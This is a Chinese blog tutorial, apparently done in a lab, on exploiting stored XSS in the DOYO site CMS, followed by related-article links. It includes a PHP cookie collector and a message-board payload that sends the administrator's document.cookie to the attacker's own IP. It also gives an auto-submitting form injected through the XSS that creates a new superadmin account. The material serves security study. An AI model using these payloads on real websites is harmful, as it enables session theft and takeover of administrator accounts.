DOYO网站xss漏洞测试
一、寻找xss漏洞
一般想获取最高权限,就要找存储型xss漏洞,这样的漏洞是服务器和浏览器进行数据交换的,有利于数据写入进去。一般留言板、评论区可能性最大。
1、评论区 <script>alert(1111)</script>
弹出1111,证明咱们找到评论区xss的漏洞了。并且代码也执行了。
2、留言板 aaaaa<script>alert(222)</script>
由于这个留言需要管理员审查,我们去后台看一下,有没有弹窗。
证明咱们留言板的xss漏洞也找到了。并且代码执行了。
二、利用漏洞
通过上述操作,我们会发现,评论区管理员不需要做什么,就可以简单的发上去,但是留言板需要管理员审查才可以发表上去。我们可以利用xss漏洞获取管理员权限,为了可以获取管理员权限,这次需要管理员配合我们获取(比如点击我们写的留言,查看我们留言什么的),总之为了获取管理权限,不能少了管理员。
1、我们需要获取管理员的账号和密码,但是这个除了sql注入,目前还没什么更快的办法获取到。这样我们就要思维活跃一点不能让思维困住我们,之前学过cookie和SESSID,这俩个是存储密码用的(不懂的童鞋,看我之前的博客学习一下,这里不讲)为了我们能获取到管理员的cookie。我们需要用php写一段代码:
<?php
$referer = $_SERVER['HTTP_REFERER'];//超级全局变量(告诉服务器从哪来的)获取前一个页面的url地址。
$cookie = $_GET['cookie'];//获取cookie值
$time= date ("y-m-d G-i-s A");//添加时间戳
$file = fopen('abs.txt','a+');//创建文本名字是abs.txt,权限是a+(可读写模式)
fwrite($file,"cookie:".$cookie."/n referer:".$referer."/n time:".$time);//写入文件括号里的是想要的值
fclose($file);//关闭文件
?>
2、下面就需要把这句话添加到留言板里具体代码如下:
aaa<script>window.location.href="http://10.10.87.228/qwer/test.php?cookie="+document.cookie</script>//执行获取管理员cookie的语句
这里的ip地址是自己的电脑的地址,为了是获取完cookie传回本地电脑。
注:并且这个网页是可以访问的啊,要不然接受不到cookie。
注:用网页直接访问是不显示任何东西的。
写在留言板里
然后在本地目录就会生成一个abs.txt的文件。
这样我们就轻易的获取到管理员的cookie了,我们用大神写好的软件进一下管理的后台。
地址就填网站的管理员地址,再把提交方式改成GET,然后吧咱们获取的cookie填到里面。这样我们就不要任何的账号密码就顺利的进去后台管理页面了。
三、利用xss漏洞添加一个超级管理员
1.我们通过burp抓包,发现添加管理员页面发现这些变量。
2.一个是网页提交地址,一个是提交变量的名字。这样我们就可以自己写一个html网页把这些变量重新按我们想要的结果编写。代码如下:
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Title</title>
</head>
<body>
<form action="http://10.10.87.172/qzm/admin.php?c=a_adminuser&a=add&run=1" method="post" name="form1">//一个form表单,跳转地址是服务器地址,提交方式是post。<input type="hidden" name="auser" value="qqq">//添加的用户名是qqq<input type="hidden" name="apass" value="qqq">//添加的用户密码是qqq<input type="hidden" name="gid" value="1">//添加的我用户组是1<input type="hidden" name="level" value="1">//添加的用户权限是1<button type="submit" name="ok">123456</button>//提交按钮
</form>
<script>document.form1.submit();//执行提交动作
</script>
</body>
</html>
3.继续利用刚才的留言板漏洞插入js代码
qzm//执行添加管理员语句
注:代码同样是可以执行的
注:执行过程比较快
成功添加管理员qqq
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。
DOYO网站xss漏洞测试相关推荐
- Web应用进行XSS漏洞测试
对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意 ...
- xss植入_网站xss漏洞的利用过程
XSS跨站脚本,是一种Web安全漏洞,有趣是是他并不像SQL注入等攻击手段攻击服务端,本身对Web服务器没有危害,攻击的对象是客户端,使用浏览器访问这些恶意地址的网民.这里就跟大家稍微讲解一下网站xs ...
- 回顾几个常见的XSS漏洞测试脚本
回顾几个常见的XSS漏洞测试脚本 基础的测试: <script>alert('xss')</script> 如果过滤了指定标签 比如:<script>标签 < ...
- 渗透测试服务 甲方公司OA网站系统漏洞测试
渗透测试服务,是甲方授权乙方安全公司对自身的网站,以及APP,办公系统进行的全面人工安全渗透,对漏洞的检测与测试,包括SQL注入漏洞,XSS存储漏洞,反射漏洞,逻辑漏洞,越权漏洞,我们SINE安全公司 ...
- OWASP出品:Xenotix XSS漏洞测试框架及简单使用
OWASP Xenotix XSS Exploit Framework是一个高效的跨站脚本漏洞(XSS)检测和攻击测试框架.它通过特有的三大浏览器引擎(包括Trident, WebKit和Gecko) ...
- 网站安全漏洞测试 学习经验分享
对新知识的学习,应该明确三点:学些什么?怎样去学?三是及时复习.本文以这三点为基础,围绕信息安全学习过程展开论述.大型目标点,在新知识的学习中,明确学习目标是第一件要做的事,有目标才知道自己该往哪里走 ...
- 【网络安全】Xss漏洞
xss漏洞 xss漏洞介绍 危害 防御方法 xss测试语句 xss攻击语句 1. 反射性xss 2.存储型xss 3.DOM型xss dvwa靶场各等级渗透方法 xss反射型(存储型方法一致) Low ...
- 基于网络爬虫的XSS漏洞检测技术
1. 背景和意义 在早期的网站设计中,网页的存在形式都是静态的.静态的网页内容稳定,不会经常更新,但是在后期却不易维护.如果需要维护更新网页,则必须重新编辑HTML网页,因此当网站很庞大的时候,维护静 ...
- XSS Reflected 测试
前言 由于最近在做XSS方面的测试,于是找到了DVWA平台进行实验测试,通过这三篇文章让大家了解XSS方面的大概内容,这三篇文章只是把你领进XSS的大门,要想真正深入的学习XSS,你还需要去学习很多东 ...
最新文章
- .net面试题大全,绝大部分面试题(有答案)
- 利用MultipartFile实现文件上传
- 通过 pxe(网络安装)完成centos 系统的网络安装
- 23种设计模式之中介者模式
- 计算机组成原理—双口RAM和多模块存储器
- postman导出请求url_postman接口测试之复制多个接口或collections到某个子文件夹或collections下...
- 游戏筑基开发之C语言回调函数使用实例及其.h库封装实例
- python—模块-configparser
- 东南大学2005年程序设计第二届初赛解题报告
- R语言中如何查看已安装的R包
- 测试山石防火墙 接口中 逆向路由 设置与urpf是否有关
- 5V限流IC,0.4A-4.8A可调限流芯片解决方案
- 磁性能测量-软磁材料的退磁方法
- 图层蒙版和图层剪贴路径_:图层蒙版和剪贴蒙版.ppt
- 基于LSTM的短期股票预测
- 如何安装redis和给wordpres加速?
- 数据库迁移 软件Spoon Kettle环境搭配(本人踩过的坑)
- Win10睡眠唤醒后显示网络电缆被拔出怎么办
- 荣达嵌入式打印机打印效果
- PS2018学习笔记(19-24节)